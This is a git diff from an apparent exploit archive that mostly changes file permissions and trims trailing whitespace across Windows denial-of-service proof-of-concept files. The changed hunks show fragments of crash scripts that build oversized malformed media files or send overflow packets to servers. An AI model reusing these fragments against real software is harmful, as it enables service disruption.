a/platforms/windows/dos/14608.txt b/platforms/windows/dos/14608.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/14611.c b/platforms/windows/dos/14611.c old mode 100755 new mode 100644 index ce63592fa..9bbf6cfe0 --- a/platforms/windows/dos/14611.c +++ b/platforms/windows/dos/14611.c @@ -26,4 +26,4 @@ PostMessage (hwnd, 0x4c, 0x4, 0x80000000); return 0; -) \ No newline at end of file +) \ No newline at end of file diff --git a/platforms/windows/dos/14634.txt b/platforms/windows/dos/14634.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/14642.txt b/platforms/windows/dos/14642.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/14666.txt b/platforms/windows/dos/14666.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/14667.txt b/platforms/windows/dos/14667.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/14668.txt b/platforms/windows/dos/14668.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/14669.txt b/platforms/windows/dos/14669.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/14670.txt b/platforms/windows/dos/14670.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/14671.py b/platforms/windows/dos/14671.py index 7da65a3e5..7143bfc5c 100755 --- a/platforms/windows/dos/14671.py +++ b/platforms/windows/dos/14671.py @@ -53,5 +53,4 @@ try: print "[+] File created successfully !" sys.exit(0) except: - print "[-] Error cant write file to system\n" - \ No newline at end of file + print "[-] Error cant write file to system\n" \ No newline at end of file diff --git a/platforms/windows/dos/14683.py b/platforms/windows/dos/14683.py index 16a9360c1..5d109ea5d 100755 --- a/platforms/windows/dos/14683.py +++ b/platforms/windows/dos/14683.py @@ -73,8 +73,4 @@ try: except: print ("[*] Success! We crashed the server in %d attempts." % x); - print ("[i] [pocoftheday.blogspot.com]"); - - - - \ No newline at end of file + print ("[i] [pocoftheday.blogspot.com]"); \ No newline at end of file diff --git a/platforms/windows/dos/14687.txt b/platforms/windows/dos/14687.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/147.c b/platforms/windows/dos/147.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/14705.c b/platforms/windows/dos/14705.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1475.html b/platforms/windows/dos/1475.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/14767.txt b/platforms/windows/dos/14767.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/14824.txt b/platforms/windows/dos/14824.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/14843.txt b/platforms/windows/dos/14843.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/14852.txt b/platforms/windows/dos/14852.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/14858.txt b/platforms/windows/dos/14858.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1488.txt b/platforms/windows/dos/1488.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/14882.txt b/platforms/windows/dos/14882.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/14883.txt b/platforms/windows/dos/14883.txt old mode 100755 new mode 100644 index 160433201..14009f67c --- a/platforms/windows/dos/14883.txt +++ b/platforms/windows/dos/14883.txt @@ -100,5 +100,4 @@ char data[18448] char data[7807] = -120 PoC: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14883.rar (IntelVideoCodecs5RemoteDenialofService.rar) - \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14883.rar (IntelVideoCodecs5RemoteDenialofService.rar) \ No newline at end of file diff --git a/platforms/windows/dos/14892.py b/platforms/windows/dos/14892.py index 0c5c48177..bc4752502 100755 --- a/platforms/windows/dos/14892.py +++ b/platforms/windows/dos/14892.py @@ -46,6 +46,4 @@ data2 = ( wizz = open("Mahboul-3lik.xspf","w") wizz.write(data1 + buff + data2) -wizz.close() - - \ No newline at end of file +wizz.close() \ No newline at end of file diff --git a/platforms/windows/dos/14937.py b/platforms/windows/dos/14937.py index a66b2a21a..3b77d6fc2 100755 --- a/platforms/windows/dos/14937.py +++ b/platforms/windows/dos/14937.py @@ -17,6 +17,4 @@ boom =("\x52\x49\x46\x46\x24\x80\x03\x20\x57\x41\x56\x45\x20") buff = ("\x41" * 50000 ) wizz = open("Mahboul-3lik.wav","w") wizz.write(boom + buff ) -wizz.close() - - \ No newline at end of file +wizz.close() \ No newline at end of file diff --git a/platforms/windows/dos/14938.txt b/platforms/windows/dos/14938.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/14967.txt b/platforms/windows/dos/14967.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/14974.txt b/platforms/windows/dos/14974.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/14990.txt b/platforms/windows/dos/14990.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1500.cpp b/platforms/windows/dos/1500.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15019.txt b/platforms/windows/dos/15019.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15034.txt b/platforms/windows/dos/15034.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15061.txt b/platforms/windows/dos/15061.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15065.txt b/platforms/windows/dos/15065.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15076.py b/platforms/windows/dos/15076.py index da9cc484d..6adca7914 100755 --- a/platforms/windows/dos/15076.py +++ b/platforms/windows/dos/15076.py @@ -47,4 +47,4 @@ pocFile.write(sampleFile.read(-1)) sampleFile.close() pocFile.seek(13168) pocFile.write("\xff\xff\xff\xff\x11\x11") -pocFile.close() \ No newline at end of file +pocFile.close() \ No newline at end of file diff --git a/platforms/windows/dos/15088.txt b/platforms/windows/dos/15088.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15122.html b/platforms/windows/dos/15122.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15131.txt b/platforms/windows/dos/15131.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15148.txt b/platforms/windows/dos/15148.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15167.txt b/platforms/windows/dos/15167.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15242.html b/platforms/windows/dos/15242.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15243.html b/platforms/windows/dos/15243.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15248.txt b/platforms/windows/dos/15248.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15259.txt b/platforms/windows/dos/15259.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15260.txt b/platforms/windows/dos/15260.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15262.txt b/platforms/windows/dos/15262.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15283.txt b/platforms/windows/dos/15283.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15297.txt b/platforms/windows/dos/15297.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/153.c b/platforms/windows/dos/153.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1535.c b/platforms/windows/dos/1535.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15383.c b/platforms/windows/dos/15383.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15384.c b/platforms/windows/dos/15384.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15394.txt b/platforms/windows/dos/15394.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15407.txt b/platforms/windows/dos/15407.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15408.html b/platforms/windows/dos/15408.html old mode 100755 new mode 100644 index f635df4ef..a69027a14 --- a/platforms/windows/dos/15408.html +++ b/platforms/windows/dos/15408.html @@ -16,7 +16,4 @@ arg1=String(65535, "A") target.SearchByFormula arg1 -</script> - - - \ No newline at end of file +</script> \ No newline at end of file diff --git a/platforms/windows/dos/15418.html b/platforms/windows/dos/15418.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15419.txt b/platforms/windows/dos/15419.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15420.c b/platforms/windows/dos/15420.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15426.txt b/platforms/windows/dos/15426.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15429.txt b/platforms/windows/dos/15429.txt old mode 100755 new mode 100644 index 0e411e4ad..2b757e68a --- a/platforms/windows/dos/15429.txt +++ b/platforms/windows/dos/15429.txt @@ -19,9 +19,4 @@ Target Directory : "c:\fuzz\bkf\" #Create the directory if it's dosent existe in Execute menu Application : "C:\WINDOWS\system32\ntbackup.exe" -Arguments : by default its "{0}" change it to "{A}" and presse execute wish will cause the application to crash - - - - - \ No newline at end of file +Arguments : by default its "{0}" change it to "{A}" and presse execute wish will cause the application to crash \ No newline at end of file diff --git a/platforms/windows/dos/15432.html b/platforms/windows/dos/15432.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15433.html b/platforms/windows/dos/15433.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15434.html b/platforms/windows/dos/15434.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15435.html b/platforms/windows/dos/15435.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15436.html b/platforms/windows/dos/15436.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15444.txt b/platforms/windows/dos/15444.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15458.txt b/platforms/windows/dos/15458.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15482.html b/platforms/windows/dos/15482.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15514.txt b/platforms/windows/dos/15514.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1557.c b/platforms/windows/dos/1557.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1558.c b/platforms/windows/dos/1558.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15581.txt b/platforms/windows/dos/15581.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1559.c b/platforms/windows/dos/1559.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1560.c b/platforms/windows/dos/1560.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15635.py b/platforms/windows/dos/15635.py index f4ebe425e..2e627019d 100755 --- a/platforms/windows/dos/15635.py +++ b/platforms/windows/dos/15635.py @@ -17,4 +17,4 @@ try: f.close() print "[-] File created!\n" except: - print "[-] Error occured!\n" \ No newline at end of file + print "[-] Error occured!\n" \ No newline at end of file diff --git a/platforms/windows/dos/1564.c b/platforms/windows/dos/1564.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15657.txt b/platforms/windows/dos/15657.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15669.py b/platforms/windows/dos/15669.py index 0f3a45a5c..9b7caf6d8 100755 --- a/platforms/windows/dos/15669.py +++ b/platforms/windows/dos/15669.py @@ -17,4 +17,4 @@ try: f.close() print "[-] File created!\n" except: - print "[-] Error occured!\n" \ No newline at end of file + print "[-] Error occured!\n" \ No newline at end of file diff --git a/platforms/windows/dos/15694.txt b/platforms/windows/dos/15694.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15695.txt b/platforms/windows/dos/15695.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15697.html b/platforms/windows/dos/15697.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15698.html b/platforms/windows/dos/15698.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15708.html b/platforms/windows/dos/15708.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15786.py b/platforms/windows/dos/15786.py index c179be3c9..ae5ae4edc 100755 --- a/platforms/windows/dos/15786.py +++ b/platforms/windows/dos/15786.py @@ -23,4 +23,4 @@ try: print "Vulnerable files created!..." print "Insert mp3 files into the application and select join\n" except: - print "Error occured!" \ No newline at end of file + print "Error occured!" \ No newline at end of file diff --git a/platforms/windows/dos/15787.py b/platforms/windows/dos/15787.py index 41adaa6bf..0c3692289 100755 --- a/platforms/windows/dos/15787.py +++ b/platforms/windows/dos/15787.py @@ -20,4 +20,4 @@ try: print " Vulnerable file created!..." print " Insert mp3 file into the application and select convert\n" except: - print "[-] Error occured!" \ No newline at end of file + print "[-] Error occured!" \ No newline at end of file diff --git a/platforms/windows/dos/15788.py b/platforms/windows/dos/15788.py index 84a41fbd1..16768e77a 100755 --- a/platforms/windows/dos/15788.py +++ b/platforms/windows/dos/15788.py @@ -20,4 +20,4 @@ try: print " Vulnerable file created!..." print " Insert mp3 file into the application and select cut\n" except: - print "[-] Error occured!" \ No newline at end of file + print "[-] Error occured!" \ No newline at end of file diff --git a/platforms/windows/dos/15839.php b/platforms/windows/dos/15839.php old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15894.c b/platforms/windows/dos/15894.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15925.txt b/platforms/windows/dos/15925.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1593.c b/platforms/windows/dos/1593.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1598.html b/platforms/windows/dos/1598.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1599.cpp b/platforms/windows/dos/1599.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15992.txt b/platforms/windows/dos/15992.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/15998.txt b/platforms/windows/dos/15998.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/16002.html b/platforms/windows/dos/16002.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1601.c b/platforms/windows/dos/1601.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/16012.html b/platforms/windows/dos/16012.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/16021.c b/platforms/windows/dos/16021.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/16022.c b/platforms/windows/dos/16022.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/16023.c b/platforms/windows/dos/16023.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1603.c b/platforms/windows/dos/1603.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1604.html b/platforms/windows/dos/1604.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/16084.html b/platforms/windows/dos/16084.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/161.c b/platforms/windows/dos/161.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/16120.py b/platforms/windows/dos/16120.py index cfc98366e..e54bf7441 100755 --- a/platforms/windows/dos/16120.py +++ b/platforms/windows/dos/16120.py @@ -34,6 +34,4 @@ try: f.close() print "File created" except: - print "File cannot be created" - - \ No newline at end of file + print "File cannot be created" \ No newline at end of file diff --git a/platforms/windows/dos/16121.py b/platforms/windows/dos/16121.py index 03f76d4cc..946ab4624 100755 --- a/platforms/windows/dos/16121.py +++ b/platforms/windows/dos/16121.py @@ -21,9 +21,4 @@ try: f.close() print "File created" except: - print "File cannot be created" - - - - - \ No newline at end of file + print "File cannot be created" \ No newline at end of file diff --git a/platforms/windows/dos/1613.c b/platforms/windows/dos/1613.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1614.c b/platforms/windows/dos/1614.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1615.txt b/platforms/windows/dos/1615.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/16203.txt b/platforms/windows/dos/16203.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/16230.py b/platforms/windows/dos/16230.py index e8600ad68..46986a17f 100755 --- a/platforms/windows/dos/16230.py +++ b/platforms/windows/dos/16230.py @@ -99,5 +99,4 @@ try: except: - print "\t\t[+]Erro ao Se Conectar no Servidor "+sys.argv[1]+" Na Porta "+sys.argv[2]+"\n" - \ No newline at end of file + print "\t\t[+]Erro ao Se Conectar no Servidor "+sys.argv[1]+" Na Porta "+sys.argv[2]+"\n" \ No newline at end of file diff --git a/platforms/windows/dos/16254.txt b/platforms/windows/dos/16254.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/16255.pl b/platforms/windows/dos/16255.pl index 37b6be4cc..9ea00b275 100755 --- a/platforms/windows/dos/16255.pl +++ b/platforms/windows/dos/16255.pl @@ -11,5 +11,4 @@ open($FILE,">$file"); print $FILE $junk; close($FILE); print "Files Created successfully\n"; -sleep(1); - \ No newline at end of file +sleep(1); \ No newline at end of file diff --git a/platforms/windows/dos/16262.c b/platforms/windows/dos/16262.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1633.c b/platforms/windows/dos/1633.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1642.c b/platforms/windows/dos/1642.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1643.c b/platforms/windows/dos/1643.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1688.c b/platforms/windows/dos/1688.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/16979.html b/platforms/windows/dos/16979.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17019.txt b/platforms/windows/dos/17019.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17023.txt b/platforms/windows/dos/17023.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17025.txt b/platforms/windows/dos/17025.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17032.txt b/platforms/windows/dos/17032.txt old mode 100755 new mode 100644 index 737b9b746..f3e833dea --- a/platforms/windows/dos/17032.txt +++ b/platforms/windows/dos/17032.txt @@ -62,5 +62,4 @@ Exception was not handled by user's code, so application was forced to close 78138A19 Main PUSH C000000D ; ESP=0012E4D8 78138A1E Main CALL DWORD PTR DS:[<&KERNEL32.GetCurrentProcess>]; FL=PS, EAX=FFFFFFFF 78138A24 Main PUSH EAX ; ESP=0012E4D4 -78138A25 Main CALL DWORD PTR DS:[<&KERNEL32.TerminateProcess>]; FL=P, EAX=00000000, ECX=0039B9B8, EBX=00000000, ESP=022AFF70, - \ No newline at end of file +78138A25 Main CALL DWORD PTR DS:[<&KERNEL32.TerminateProcess>]; FL=P, EAX=00000000, ECX=0039B9B8, EBX=00000000, ESP=022AFF70, \ No newline at end of file diff --git a/platforms/windows/dos/17045.py b/platforms/windows/dos/17045.py index 8d3a71d94..d9b9ddeb7 100755 --- a/platforms/windows/dos/17045.py +++ b/platforms/windows/dos/17045.py @@ -20,5 +20,4 @@ crash = "A" * 2000 print "Sending crash...." pwned = "\x00\x02" + "A" + "\x00" + crash + "\x00" -s.sendto(pwned, (host, port)) - \ No newline at end of file +s.sendto(pwned, (host, port)) \ No newline at end of file diff --git a/platforms/windows/dos/17071.py b/platforms/windows/dos/17071.py index b10d695d0..9615de1d7 100755 --- a/platforms/windows/dos/17071.py +++ b/platforms/windows/dos/17071.py @@ -18,7 +18,4 @@ f.write(poc) f.close() print "Done, 1 file generated on 'C:\\' ..." -print "Play this file with GOM Player 2.1.28.5039 and enjoy ;)" - - - \ No newline at end of file +print "Play this file with GOM Player 2.1.28.5039 and enjoy ;)" \ No newline at end of file diff --git a/platforms/windows/dos/17072.py b/platforms/windows/dos/17072.py index 40119e550..aed19f213 100755 --- a/platforms/windows/dos/17072.py +++ b/platforms/windows/dos/17072.py @@ -25,4 +25,4 @@ f.close() print "Done, 1 file generated on 'C:\\' ..." print "Highlight (select) generated file in Explorer" -print "DoS is triggered when Explorer tries to render AVI file for preview" \ No newline at end of file +print "DoS is triggered when Explorer tries to render AVI file for preview" \ No newline at end of file diff --git a/platforms/windows/dos/17074.py b/platforms/windows/dos/17074.py index ee6a5d937..fd5564a14 100755 --- a/platforms/windows/dos/17074.py +++ b/platforms/windows/dos/17074.py @@ -35,7 +35,4 @@ f.write(poc) f.close() print "Done, 1 file generated on 'C:\\' ..." -print "Play this file with Winamp 5.61 and enjoy ;)" - - - \ No newline at end of file +print "Play this file with Winamp 5.61 and enjoy ;)" \ No newline at end of file diff --git a/platforms/windows/dos/17075.py b/platforms/windows/dos/17075.py index 2c6c2021a..27ce32c70 100755 --- a/platforms/windows/dos/17075.py +++ b/platforms/windows/dos/17075.py @@ -28,7 +28,4 @@ f.write(poc) f.close() print "Done, 1 file generated on 'C:\\' ..." -print "Play this file with Media Player Classic - Home Cinema 1.5.0.2827 and enjoy ;)" - - - \ No newline at end of file +print "Play this file with Media Player Classic - Home Cinema 1.5.0.2827 and enjoy ;)" \ No newline at end of file diff --git a/platforms/windows/dos/1708.txt b/platforms/windows/dos/1708.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17133.c b/platforms/windows/dos/17133.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17142.py b/platforms/windows/dos/17142.py index d298e6b8f..51e4222b2 100755 --- a/platforms/windows/dos/17142.py +++ b/platforms/windows/dos/17142.py @@ -39,7 +39,4 @@ f.write(poc) f.close() print "Done, 1 file generated on 'C:\\' ..." -print "Open this file in IrfanView 4.28 and enjoy ;)" - - - \ No newline at end of file +print "Open this file in IrfanView 4.28 and enjoy ;)" \ No newline at end of file diff --git a/platforms/windows/dos/17143.py b/platforms/windows/dos/17143.py index 51e7c2ca3..3feb0ad6f 100755 --- a/platforms/windows/dos/17143.py +++ b/platforms/windows/dos/17143.py @@ -39,7 +39,4 @@ f.write(poc) f.close() print "Done, 1 file generated on 'C:\\' ..." -print "Open this file in IrfanView 4.28 and enjoy ;)" - - - \ No newline at end of file +print "Open this file in IrfanView 4.28 and enjoy ;)" \ No newline at end of file diff --git a/platforms/windows/dos/17159.txt b/platforms/windows/dos/17159.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17160.txt b/platforms/windows/dos/17160.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17161.txt b/platforms/windows/dos/17161.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17162.txt b/platforms/windows/dos/17162.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17163.txt b/platforms/windows/dos/17163.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17164.txt b/platforms/windows/dos/17164.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17188.txt b/platforms/windows/dos/17188.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17266.txt b/platforms/windows/dos/17266.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17273.c b/platforms/windows/dos/17273.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17274.txt b/platforms/windows/dos/17274.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17287.mid b/platforms/windows/dos/17287.mid old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17372.txt b/platforms/windows/dos/17372.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17387.html b/platforms/windows/dos/17387.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17396.html b/platforms/windows/dos/17396.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17398.txt b/platforms/windows/dos/17398.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17399.txt b/platforms/windows/dos/17399.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17401.txt b/platforms/windows/dos/17401.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17405.txt b/platforms/windows/dos/17405.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17421.py b/platforms/windows/dos/17421.py index 107c97220..72b30ace0 100755 --- a/platforms/windows/dos/17421.py +++ b/platforms/windows/dos/17421.py @@ -44,5 +44,4 @@ f.write(poc) f.close() print "Done, 2nd file generated on 'C:\\' ..." -print "Open this file in XnView 1.98 and enjoy ;)" - \ No newline at end of file +print "Open this file in XnView 1.98 and enjoy ;)" \ No newline at end of file diff --git a/platforms/windows/dos/17458.txt b/platforms/windows/dos/17458.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17461.txt b/platforms/windows/dos/17461.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17497.txt b/platforms/windows/dos/17497.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17544.txt b/platforms/windows/dos/17544.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1757.c b/platforms/windows/dos/1757.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17582.txt b/platforms/windows/dos/17582.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17583.txt b/platforms/windows/dos/17583.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/176.c b/platforms/windows/dos/176.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17620.txt b/platforms/windows/dos/17620.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17642.txt b/platforms/windows/dos/17642.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17712.txt b/platforms/windows/dos/17712.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1775.html b/platforms/windows/dos/1775.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17772.txt b/platforms/windows/dos/17772.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17795.py b/platforms/windows/dos/17795.py index f0a6fc03c..570189b20 100755 --- a/platforms/windows/dos/17795.py +++ b/platforms/windows/dos/17795.py @@ -44,7 +44,4 @@ print (r) s.send(cmd + " " + data1 + data2 + '\r\n') print ("Payload Send!\n") print ("2 or 3 seconds before the blue screen of the death...") -s.close() - - - \ No newline at end of file +s.close() \ No newline at end of file diff --git a/platforms/windows/dos/17796.txt b/platforms/windows/dos/17796.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1781.txt b/platforms/windows/dos/1781.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1782.txt b/platforms/windows/dos/1782.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1783.txt b/platforms/windows/dos/1783.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17830.txt b/platforms/windows/dos/17830.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17831.txt b/platforms/windows/dos/17831.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17835.txt b/platforms/windows/dos/17835.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17836.txt b/platforms/windows/dos/17836.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17837.txt b/platforms/windows/dos/17837.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17838.txt b/platforms/windows/dos/17838.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17839.txt b/platforms/windows/dos/17839.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1784.txt b/platforms/windows/dos/1784.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17841.txt b/platforms/windows/dos/17841.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17842.txt b/platforms/windows/dos/17842.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17843.txt b/platforms/windows/dos/17843.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17844.txt b/platforms/windows/dos/17844.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17878.txt b/platforms/windows/dos/17878.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17879.txt b/platforms/windows/dos/17879.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17885.txt b/platforms/windows/dos/17885.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17889.txt b/platforms/windows/dos/17889.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17890.c b/platforms/windows/dos/17890.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17896.txt b/platforms/windows/dos/17896.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17903.txt b/platforms/windows/dos/17903.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17918.txt b/platforms/windows/dos/17918.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/1792.txt b/platforms/windows/dos/1792.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17929.txt b/platforms/windows/dos/17929.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17930.txt b/platforms/windows/dos/17930.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17931.txt b/platforms/windows/dos/17931.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17933.html b/platforms/windows/dos/17933.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17963.txt b/platforms/windows/dos/17963.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17964.txt b/platforms/windows/dos/17964.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17965.txt b/platforms/windows/dos/17965.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/17978.txt b/platforms/windows/dos/17978.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18006.html b/platforms/windows/dos/18006.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18007.txt b/platforms/windows/dos/18007.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18008.html b/platforms/windows/dos/18008.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18011.txt b/platforms/windows/dos/18011.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/18014.html b/platforms/windows/dos/18014.html old mode 100755 new mode 100644 diff --git 